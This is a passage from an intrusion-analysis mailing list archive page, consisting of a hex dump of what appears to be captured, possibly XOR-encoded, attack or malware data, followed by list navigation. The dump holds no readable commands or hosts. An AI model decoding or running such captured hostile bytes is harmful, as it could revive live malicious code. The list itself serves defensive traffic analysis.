a0a1 a1fa f7f6 f19f 2a12 51a1 a1a1 H.........*.Q... 0x00f0 2a97 2812 51a1 a1a1 9f2a 1255 a1a1 a12a *.(.Q....*.U...* 0x0100 9728 1255 a1a1 a12c 123e a1a1 a12c 1a65 .(.U...,.>...,.e 0x0110 a1a1 a149 02a3 a1a1 2822 45a1 a1a1 2c1a ...I....("E...,. 0x0120 6ba1 a1a1 4933 a3a1 a128 2249 a1a1 a12c k...I3...("I..., 0x0130 1a74 a1a1 a149 20a3 a1a1 2822 4da1 a1a1 .t...I....("M... 0x0140 2c12 aba1 a1a1 2c1a b0a1 a1a1 49cb a3a1 ,.....,.....I... 0x0150 a128 22e0 a1a1 a12c 1abd a1a1 a149 f8a3 .("....,.....I.. 0x0160 a1a1 2822 e4a1 a1a1 2c1a 82a1 a1a1 49e9 ..("....,.....I. 0x0170 a3a1 a128 22e8 a1a1 a12c 1a8a a1a1 a149 ...("....,.....I 0x0180 96a3 a1a1 2822 eca1 a1a1 2c1a 91a1 a1a1 ....("....,..... 0x0190 4987 a3a1 a128 22f0 a1a1 a12c 1a94 a1a1 I....("....,.... 0x01a0 a149 b4a3 a1a1 2822 f4a1 a1a1 2c12 f8a1 .I....("....,... 0x01b0 a1a1 2c1a c1a1 a1a1 495f a0a1 a128 2226 ..,.....I_...("& 0x01c0 a1a1 a12c 1ac7 a1a1 a149 4ca0 a1a1 2822 ...,.....IL...(" 0x01d0 2aa1 a1a1 2c1a cca1 a1a1 497d a0a1 a128 *...,.....I}...( 0x01e0 222e a1a1 a12c 1ad5 a1a1 a149 6aa0 a1a1 "....,.....Ij... 0x01f0 2822 32a1 a1a1 2c1a daa1 a1a1 491b a0a1 ("2...,.....I... 0x0200 a128 2236 a1a1 a12c 1a23 a1a1 a149 08a0 .("6...,.#...I.. 0x0210 a1a1 2822 3aa1 a1a1 f249 14a0 a1a1 faf9 ..(":....I...... 0x0220 feff 49de a2a1 a149 185f 5e5e a1a1 a1a1 ..I....I._^^.... 0x0230 a1a1 a1a1 b250 d6d2 93fe 9293 a1f6 f2e0 .....P.......... 0x0240 f2d5 c0d3 d5d4 d1a1 d2ce c2ca c4d5 a1c2 ................ 0x0250 cecf cfc4 c2d5 a1d3 c4c2 d7a1 d2c4 cfc5 ................ 0x0260 a1c2 cdce d2c4 d2ce c2ca c4d5 a1a1 a1a1 ................ 0x0270 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 ................ 0x0280 a1a1 a1a1 a1cc d2d7 c2d3 d5a1 c7ce d1c4 ................ 0x0290 cfa1 c7c2 cdce d2c4 a1c7 d6d3 c8d5 c4a1 ................ 0x02a0 ccc4 ccd2 c4d5 a1cc c0cd cdce c2a1 c7d3 ................ 0x02b0 c4c4 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 ................ 0x02c0 a1a1 a1a1 a1a1 a1a1 a1a1 a1ca c4d3 cfc4 ................ 0x02d0 cd92 93a1 e6c4 d5f1 d3ce c2e0 c5c5 d3c4 ................ 0x02e0 d2d2 a1ed cec0 c5ed c8c3 d3c0 d3d8 e0a1 ................ 0x02f0 f2cd c4c4 d1a1 e4d9 c8d5 f5c9 d3c4 c0c5 ................ 0x0300 a1e2 d3c4 c0d5 c4f1 d3ce c2c4 d2d2 e0a1 ................ 0x0310 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 ddb1 a1a0 ................ 0x0320 95b1 a1a0 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 ................ 0x0330 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 ................ 0x0340 a1a1 a1a1 a1a1 a1a1 e5a1 a1a1 a1a1 a1a1 ................ 0x0350 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 ................ 0x0360 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 ................ 0x0370 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 ................ 0x0380 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 a1a1 ................ 0x0390 d68a c3a1 a1a1 a1a1 d6c8 cfc9 cdd1 d192 ................ 0x03a0 938f c4d9 c4a1 ced1 c4cf a1b7 a1a1 a1a1 ................ 0x03b0 a1a1 a1a1 a1a1 a1a1 a1a1 a1f0 f6f7 f75e ...............^ 0x03c0 3251 a1a1 a1f1 f8f6 f05e 3255 a1a1 a1ff 2Q.......^2U.... 0x03d0 fef8 62f1 19a1 a5a1 a149 b7a0 a1a1 2822 ..b......I....(" 0x03e0 22a0 a1a1 f92a 3222 a0a1 a1f3 c9a0 a0a1 "....*2"........ 0x03f0 a19f 5ef2 e0c9 a7a1 a1a1 c9a0 a1a1 a1c9 ..^............. 0x0400 a3a1 a1a1 9f5e f2e4 9c5e 5e5e 5eae 2532 .....^...^^^^.%2 0x0410 a0a1 a128 2259 a1a1 a1f6 f1f2 2c32 dea0 ...("Y......,2.. 0x0420 a1a1 67a3 b7f3 2c32 5da1 a1a1 c766 a3a3 ..g...,2]....f.. 0x0430 a1c7 2ada a9c7 28db a32a daa5 28db a5f3 ..*...(..*..(... 0x0440 f19f 5ef2 e89c a1a1 a1a1 ae2d f7a0 a1a1 ..^........-.... 0x0450 faf9 fef1 19a1 b1a1 a149 37a1 a1a1 2822 .........I7...(" 0x0460 c1a0 a1a1 f949 b1a1 a1a1 4905 a1a1 a149 .....I....I....I 0x0470 82a1 a1a1 494a a1a1 a162 c9a1 a1a1 a1c9 ....IJ...b...... 0x0480 a5a1 a1a1 2c32 26a0 a1a1 f32a 3259 a1a1 ....,2&....*2Y.. 0x0490 a1f3 9f5e f2ec 62f6 f72a 1a26 a0a1 a12a ...^..b..*.&...* 0x04a0 122a a0a1 a198 56ff feae 2593 a1a1 a1c9 .*....V...%..... 0x04b0 a1a1 a1a1 c9a1 b1a1 a12a 32c1 a0a1 a1f3 .........*2..... 0x04c0 2a32 59a1 a1a1 f39f 5ef2 ec9c a1a1 a1a1 *2Y.....^....... 0x04d0 ae2d 71a1 a1a1 a022 2aa0 a1a1 48f1 a1a1 .-q...."*...H... 0x04e0 a149 cfa1 a1a1 f12a 2259 a1a1 a1f1 9f5e .I.....*"Y.....^ 0x04f0 f2f4 f962 2866 f19f 5e32 36a1 a1a1 fef1 ...b(f..^26..... 0x0500 f6c9 a1a1 a1a1 f19f 5e32 32a1 a1a1 fefe ........^22..... 0x0510 fef9 622c 32c5 a0a1 a1f3 2c32 cda0 a1a1 ..b,2.....,2.... 0x0520 f39f 5e32 26a1 a1a1 fefe 2822 c9a0 a1a1 ..^2&.....(".... 0x0530 625e 12c9 a0a1 a1f1 c9a0 a1a1 a12a 32c1 b^...........*2. 0x0540 a0a1 a1f3 9f5e 322e a1a1 a1fe fefe fe48 .....^2........H 0x0550 e25e 5e5e 2a32 c9a0 a1a1 f39f 5e32 2aa1 .^^^*2......^2*. 0x0560 a1a1 fe62 f12c 22ad a0a1 a1f1 2c22 bda0 ...b.,".....,".. 0x0570 a1a1 f1c9 a1a1 a1a1 c9a1 a1a1 a1c9 89a1 ................ 0x0580 a1a1 c9a1 a1a1 a1c9 a1a1 a1a1 c9a1 a1a1 ................ 0x0590 a12c 22cd a0a1 a1f1 c9a1 a1a1 a19f 5e32 .,"...........^2 0x05a0 4da1 a1a1 f962 4908 5e5e 5ec9 a1a1 a1a1 M....bI.^^^..... 0x05b0 5e32 49a1 a1a1 31a1 ^2I...1. _______________________________________________ Intrusions mailing list Intrusions@xxxxxxxxxxxxxx http://www.dshield.org/mailman/listinfo/intrusions |
|
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| Previous by Date: | Re: strange mail connections: 00043, Maxime Ducharme |
|---|---|
| Next by Date: | RE:strange mail connections: 00043, lola marais |
| Previous by Thread: | RE: Excessively large URI attacksi: 00043, Smith, Donald |
| Next by Thread: | LOGS: GIAC GCIA Version 3.4 Practical Detect Blaine Hein: 00043, blaine.hein |
| Indexes: | [Date] [Thread] [Top] [All Lists] |
| News | FAQ | advertise |